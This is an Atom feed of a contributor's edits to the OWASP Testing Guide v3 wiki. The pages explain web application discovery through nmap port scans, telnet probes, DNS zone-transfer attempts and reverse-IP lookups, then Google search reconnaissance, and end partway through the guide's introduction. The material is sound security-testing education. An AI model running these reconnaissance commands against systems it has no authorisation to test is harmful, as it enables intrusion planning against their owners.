<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=KirstenS</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=KirstenS"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/KirstenS"/>
		<updated>2026-04-20T18:12:46Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=63622</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=63622"/>
				<updated>2009-06-04T23:42:29Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A paramount step in testing for web application vulnerabilities is to find out which particular applications are hosted on a web server. Many applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to exploit data. In addition, many applications are often misconfigured or not updated, due to the perception that they are only used &amp;quot;internally&amp;quot; and therefore no threat exists.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve to the same IP address (this scenario is not limited to hosting environments, but also applies to ordinary corporate environments as well).&lt;br /&gt;
&lt;br /&gt;
As a security professional, you are sometimes given a set of IP addresses (or possibly just one) as a target to test. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case, it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is that the given IP address hosts an HTTP service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a number of web applications, associated to unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes, the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e., it could omit some symbolic names – and the client may not even being aware of that (this is more likely to happen in large organizations)!&lt;br /&gt;
&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&lt;br /&gt;
To address these issues, it is necessary to perform web application discovery.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two.&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should identify all the applications accessible through the given target. In the following examples, we will examine a few techniques that can be employed to achieve this goal. &lt;br /&gt;
&lt;br /&gt;
'''Note:''' Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100''), which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&lt;br /&gt;
There are three factors influencing how many applications are related to a given DNS name (or an IP address):&lt;br /&gt;
&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e., with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, even though this is the most common situation, there is nothing forcing the application to start at “/”.&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as:&lt;br /&gt;
http://www.example.com/url1 &lt;br /&gt;
http://www.example.com/url2 &lt;br /&gt;
http://www.example.com/url3 &lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden”, unless we explicitly know how to reach them, i.e., we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location is not explicitly advertised.&lt;br /&gt;
&lt;br /&gt;
'''2. Non-standard ports'''&amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&lt;br /&gt;
'''3. Virtual hosts'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows us to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to fully ascertain the existence of non-standard-named web applications. Being non-standard, there is no fixed criteria governing the naming convention, however there are a number of techniques that the tester can use to gain some additional insight. &lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect.&lt;br /&gt;
Second, these applications may be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from URLs such as https://www.example.com/webmail, https://webmail.example.com/, or https://mail.example.com/. The same holds for administrative interfaces, which may be published at hidden URLs (for example, a Tomcat administrative interface), and yet not referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is easy to check for the existence of web applications on non-standard ports. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope):&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –PN –sT –sV –p0-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and look for http or the indication of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that:&lt;br /&gt;
* There is an Apache http server running on port 80.&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed, for example, by visiting https://192.168.1.100 with a browser).&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface.&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon.&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents).&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively, we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080.&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&lt;br /&gt;
''DNS zone transfers''&amp;lt;br&amp;gt;&lt;br /&gt;
This technique has limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers. However, it may be worth a try.&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'', or ''dig'', by requesting DNS NS records.&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and the name ''mail.example.com'', determine the name servers for domain ''example.com''.&lt;br /&gt;
&lt;br /&gt;
The following example shows how to identify the name servers for www.owasp.org by using the host command:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
A zone transfer may now be requested to the name servers for domain ''example.com''. If you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNS inverse queries''&amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not guaranteed.&lt;br /&gt;
&lt;br /&gt;
''Web-based DNS searches''&amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services that enable name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertinent to the target you are examining.&lt;br /&gt;
&lt;br /&gt;
''Reverse-IP services''&amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &lt;br /&gt;
(requires free membership) &lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/  &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &lt;br /&gt;
(multiple services available) &lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &lt;br /&gt;
(multiple queries on domains and IP addresses, requires installation) &lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &lt;br /&gt;
(some services are still private at the time of writing) &lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &lt;br /&gt;
(reverse-IP/domain lookup) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following example shows the result of a query to one of the above reverse-IP services to 216.48.3.18, the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been revealed.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Googling''&amp;lt;br&amp;gt;&lt;br /&gt;
Following information gathering from the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs. &lt;br /&gt;
For instance, considering the previous example regarding ''www.owasp.org'', you could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of ''webgoat.org'', ''webscarab.com'', and ''webscarab.net''.&lt;br /&gt;
Googling techniques are explained in [[Testing: Spiders, Robots, and Crawlers (OWASP-IG-001)|Testing: Spiders, Robots, and Crawlers]].&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same as listed in Black Box testing no matter how much information you start with.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&lt;br /&gt;
* DNS lookup tools such as ''nslookup'', ''dig'' or similar. &lt;br /&gt;
* Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &lt;br /&gt;
* Search engines (Google, and other major engines). &lt;br /&gt;
* Specialized DNS-related web-based search service: see text.&lt;br /&gt;
* nmap - http://www.insecure.org &lt;br /&gt;
* Nessus Vulnerability Scanner - http://www.nessus.org&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Conduct_search_engine_discovery/reconnaissance_for_information_leakage_(OTG-INFO-001)&amp;diff=63620</id>
		<title>Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Conduct_search_engine_discovery/reconnaissance_for_information_leakage_(OTG-INFO-001)&amp;diff=63620"/>
				<updated>2009-06-04T22:37:58Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Black Box Testing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
This section describes how to search the Google Index and remove the associated web content from the Google Cache.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
Once the GoogleBot has completed crawling, it commences indexing the web page based on tags and associated attributes, such as &amp;lt;TITLE&amp;gt;, in order to return the relevant search results. [1]&lt;br /&gt;
&lt;br /&gt;
If the robots.txt file is not updated during the lifetime of the web site, then it is possible for web content not intended to be included in Google's Search Results to be returned.&lt;br /&gt;
&lt;br /&gt;
Therefore, it must be removed from the Google Cache.&lt;br /&gt;
&lt;br /&gt;
== Black Box Testing==&lt;br /&gt;
Using the advanced &amp;quot;site:&amp;quot; search operator, it is possible to restrict Search Results to a specific domain [2].&lt;br /&gt;
&lt;br /&gt;
Google provides the Advanced &amp;quot;cache:&amp;quot; search operator [2], but this is the equivalent to clicking the &amp;quot;Cached&amp;quot; next to each Google Search Result.  Hence, the use of the Advanced &amp;quot;site:&amp;quot; Search Operator and then clicking &amp;quot;Cached&amp;quot; is preferred.&lt;br /&gt;
&lt;br /&gt;
The Google SOAP Search API supports the doGetCachedPage and the associated doGetCachedPageResponse SOAP Messages [3] to assist with retrieving cached pages. An implementation of this is under development by the [[::Category:OWASP_Google_Hacking_Project |OWASP &amp;quot;Google Hacking&amp;quot; Project]].&lt;br /&gt;
&lt;br /&gt;
== Example ==&lt;br /&gt;
To find the web content of owasp.org indexed by Google Cache the following Google Search Query is issued:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
site:owasp.org&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
[[Image:Google_site_Operator_Search_Results_Example.JPG]]&lt;br /&gt;
&lt;br /&gt;
To display the index.html of owasp.org as cached by Google the following Google Search Query is issued:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cache:owasp.org&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
[[Image:Google_Cached_Example.JPG]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Grey Box testing is the same as Black Box testing above.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] &amp;quot;Google 101: How Google crawls, indexes, and serves the web&amp;quot; - http://www.google.com/support/webmasters/bin/answer.py?answer=70897 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] &amp;quot;Advanced Google Search Operators&amp;quot; - http://www.google.com/help/operators.html &amp;lt;br&amp;gt;&lt;br /&gt;
[3] &amp;quot;Google SOAP Search API&amp;quot; - http://code.google.com/apis/soapsearch/reference.html#1_2 &amp;lt;br&amp;gt;&lt;br /&gt;
[4] &amp;quot;Preventing content from appearing in Google search results&amp;quot; - http://www.google.com/support/webmasters/bin/topic.py?topic=8459&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=62232</id>
		<title>Testing Guide Introduction</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=62232"/>
				<updated>2009-05-27T12:54:40Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
=== The OWASP Testing Project ===&lt;br /&gt;
----&lt;br /&gt;
The OWASP Testing Project has been in development for many years. With this project, we wanted to help people understand the ''what'', ''why'', ''when'', ''where'', and ''how'' of testing their web applications, and not just provide a simple checklist or prescription of issues that should be addressed. The outcome of this project is a complete Testing Framework, from which others can build their own testing programs or qualify other people’s processes. The Testing Guide describes in details both the general Testing Framework and the techniques required to implement the framework in practice.&lt;br /&gt;
&lt;br /&gt;
Writing the Testing Guide has proven to be a difficult task. It has been a challenge to obtain consensus and develop the content that allows people to apply the concepts described here, while enabling them to work in their own environment and culture. It has also been a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle. &lt;br /&gt;
&lt;br /&gt;
However, we are very satisfied with the results we have reached. Many industry experts and those responsible for software security at some of the largest companies in the world are validating the Testing Framework. This framework helps organizations test their web applications in order to build reliable and secure software, rather than simply highlighting areas of weakness, although the latter is certainly a byproduct of many of OWASP’s guides and checklists. As such, we have made some hard decisions about the appropriateness of certain testing techniques and technologies, which we fully understand will not be agreed upon by everyone. However, OWASP is able to take the high ground and change culture over time through awareness and education based on consensus and experience.&lt;br /&gt;
&lt;br /&gt;
The rest of this guide is organized as follows. This introduction covers the pre-requisites of testing web applications: the scope of testing, the principles of successful testing, and testing techniques. Chapter 3 presents the OWASP Testing Framework and explains its techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing. &lt;br /&gt;
&lt;br /&gt;
'''Measuring (in)security: the Economics of Insecure Software'''&amp;lt;br&amp;gt;&lt;br /&gt;
A basic tenet of software engineering is that you can't control what you can't measure [1]. Security testing is no different. Unfortunately, measuring security is a notoriously difficult process. We will not cover this topic in detail here, since it would take a guide on its own (for an introduction, see [2]). &lt;br /&gt;
&lt;br /&gt;
One aspect that we want to emphasize, however, is that security measurements are, by necessity, about both the specific, technical issues (e.g., how prevalent a certain vulnerability is) and how these affect the economics of software. We find that most technical people understand at least the basic issues, or have a deeper understanding, of the vulnerabilities. Sadly, few are able to translate that technical knowledge into monetary terms, and, thereby, quantify the potential cost of vulnerabilities to the application owner's business. We believe that until this happens, CIOs will not be able to develop an accurate return on security investment and, subsequently, assign appropriate budgets for software security.&amp;lt;br/&amp;gt;&lt;br /&gt;
While estimating the cost of insecure software may appear a daunting task, recently there has been a significant amount of work in this direction. For example, in June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts.&lt;br /&gt;
&lt;br /&gt;
The framework described in this document encourages people to measure security throughout their entire development process. They can then relate the cost of insecure software to the impact it has on their business, and consequently develop appropriate business decisions (resources) to manage the risk. Remember: measuring and testing web applications is even more critical than for other software, since web applications are exposed to millions of users through the Internet.&lt;br /&gt;
&lt;br /&gt;
'''What is Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
What do we mean by testing? During the development life cycle of a web application, many things need to be tested. The Merriam-Webster Dictionary describes testing as: &lt;br /&gt;
* To put to test or proof. &lt;br /&gt;
* To undergo a test. &lt;br /&gt;
* To be assigned a standing or evaluation based on tests. &lt;br /&gt;
For the purposes of this document, testing is a process of comparing the state of a system/application against a set of criteria. In the security industry, people frequently test against a set of mental criteria that are neither well defined nor complete. For this reason and others, many outsiders regard security testing as a black art. This document’s aim is to change that perception and to make it easier for people without in-depth security knowledge to make a difference. &lt;br /&gt;
&lt;br /&gt;
'''Why Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
This document is designed to help organizations understand what comprises a testing program, and to help them identify the steps that they need to undertake to build and operate that testing program on their web applications. It is intended to give a broad view of the elements required to make a comprehensive web application security program. This guide can be used as a reference and as a methodology to help determine the gap between your existing practices and industry best practices. This guide allows organizations to compare themselves against industry peers, understand the magnitude of resources required to test and maintain their software, or prepare for an audit. This chapter does not go into the technical details of how to test an application, as the intent is to provide a typical security organizational framework. The technical details about how to test an application, as part of a penetration test or code review will be covered in the remaining parts of this document. &lt;br /&gt;
&lt;br /&gt;
'''When to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
Most people today don’t test the software until it has already been created and is in the deployment phase of its life cycle (i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a structure imposed on the development of software artifacts. If an SDLC is not currently being used in your environment, it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of fixing security bugs in such a model. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:SDLC.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 1: Generic SDLC Model'' &amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Companies should inspect their overall SDLC to ensure that security is an integral part of the development process. SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the development process. &lt;br /&gt;
&lt;br /&gt;
'''What to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
It can be helpful to think of software development as a combination of people, process, and technology. If these are the factors that &amp;quot;create&amp;quot; software, then it is logical that these are the factors that must be tested. Today most people generally test the technology or the software itself. &lt;br /&gt;
&lt;br /&gt;
An effective testing program should have components that test ''People'' – to ensure that there is adequate education and awareness; ''Process'' – to ensure that there are adequate policies and standards and that people know how to follow these policies; ''Technology'' – to ensure that the process has been effective in its implementation. Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present in a system will result in an incomplete and inaccurate security posture assessment. Denis Verdon, Head of Information Security at [http://www.fnf.com Fidelity National Financial] presented an excellent analogy for this misconception at the OWASP AppSec 2004 Conference in New York [5]: &amp;quot;If cars were built like applications [...] safety tests would assume frontal impact only. Cars would not be roll tested, or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.&amp;quot; &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Feedback and Comments'''&amp;lt;br&amp;gt;&lt;br /&gt;
As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being used and that it is effective and accurate.&lt;br /&gt;
&lt;br /&gt;
==Principles of Testing==&lt;br /&gt;
&lt;br /&gt;
There are some common misconceptions when developing a testing methodology to weed out security bugs in software. This chapter covers some of the basic principles that should be taken into account by professionals when testing for security bugs in software. &lt;br /&gt;
&lt;br /&gt;
'''There is No Silver Bullet'''&amp;lt;br&amp;gt;&lt;br /&gt;
While it is tempting to think that a security scanner or application firewall will either provide a multitude of defenses or identify a multitude of problems, in reality there are no silver bullets to the problem of insecure software. Application security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective at in-depth assessments and at providing adequate test coverage. Remember that security is a process, not a product. &lt;br /&gt;
&lt;br /&gt;
'''Think Strategically, Not Tactically'''&amp;lt;br&amp;gt;&lt;br /&gt;
Over the last few years, security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in information security during the 1990’s. The patch-and-penetrate model involves fixing a reported bug, but without proper investigation of the root cause. This model is usually associated with the window of vulnerability shown in the figure below. The evolution of vulnerabilities in common software used worldwide has shown the ineffectiveness of this model. Fore more information about the window of vulnerability please refer to [6]. Vulnerability studies [7] have shown that with the reaction time of attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the time between a vulnerability being uncovered and an automated attack against it being developed and released is decreasing every year. There are also several wrong assumptions in the patch-and-penetrate model: patches interfere with the normal operations and might break existing applications, and not all the users might (in the end) be aware of a patch’s availability. Consequently not all the product's users will apply patches, either because of this issue or because they lack knowledge about the patch's existence.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:WindowExposure.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 2: Window of Vulnerability''&amp;lt;/center&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
To prevent reoccurring security problems within an application, it is essential to build security into the Software Development Life Cycle (SDLC) by developing standards, policies, and guidelines that fit and work within the development methodology. Threat modeling and other techniques should be used to help assign appropriate resources to those parts of a system that are most at risk. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The SDLC is King'''&amp;lt;br&amp;gt;&lt;br /&gt;
The SDLC is a process that is well-known to developers. By integrating security into each phase of the SDLC, it allows for a holistic approach to application security that leverages the procedures already in place within the organization. Be aware that while the names of the various phases may change depending on the SDLC model used by an organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define, design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing process, to ensure a cost-effective and comprehensive security program. &lt;br /&gt;
